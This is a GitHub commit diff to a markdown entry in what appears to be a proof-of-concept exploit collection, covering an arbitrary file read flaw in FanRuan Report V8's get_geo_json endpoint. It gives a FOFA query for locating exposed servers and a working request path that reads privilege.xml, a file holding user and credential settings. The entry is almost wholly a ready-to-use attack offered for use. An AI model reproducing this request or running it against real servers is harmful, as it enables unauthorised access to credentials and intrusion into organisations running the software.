Update 帆软报表 V8 get_geo_json 任意文件读取漏洞.md

This commit is contained in:
wy876
2023-12-14 12:55:32 +08:00
committed by GitHub
parent a58423bdb4
commit 2f68634c90

View File

@@ -3,9 +3,11 @@
## fofa ## fofa
``` ```
body="isSupportForgetPwd" body="isSupportForgetPwd"
``` ```
![image](https://github.com/wy876/POC/assets/139549762/b38dbaa3-3103-45e7-980b-7f3adf6a95ba)
## poc ## poc
``` ```
WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml